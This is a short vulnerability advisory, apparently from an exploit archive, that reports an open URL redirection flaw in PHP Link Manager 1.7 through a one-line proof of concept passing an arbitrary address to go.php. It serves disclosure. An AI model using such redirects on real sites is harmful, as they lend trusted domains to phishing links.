id: 12166
date: 05/08/2010
title: PHP Link Manager Version 1.7 Url Redirection Bug
author: Itsecteam
cves: 

================================================
PHP Link Manager Version 1.7 Url Redirection Bug
================================================

PHP Link Manager Version 1.7 Url Redirection Bug
###########################################################
#Title: PHP link manager Version 1.7
#Vendor: http://www.phpjunkyard.com/php-link-manager.php
###########################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability51.htm
#Thanks: Pejvak,M3hr@n$,r3dm0v3,am!rkh@n
##########################################################
 
# POC
###########################################################
www.site.com/path/go.php?url=Your Url
###########################################################



#  0day.today [2023-03-27]  #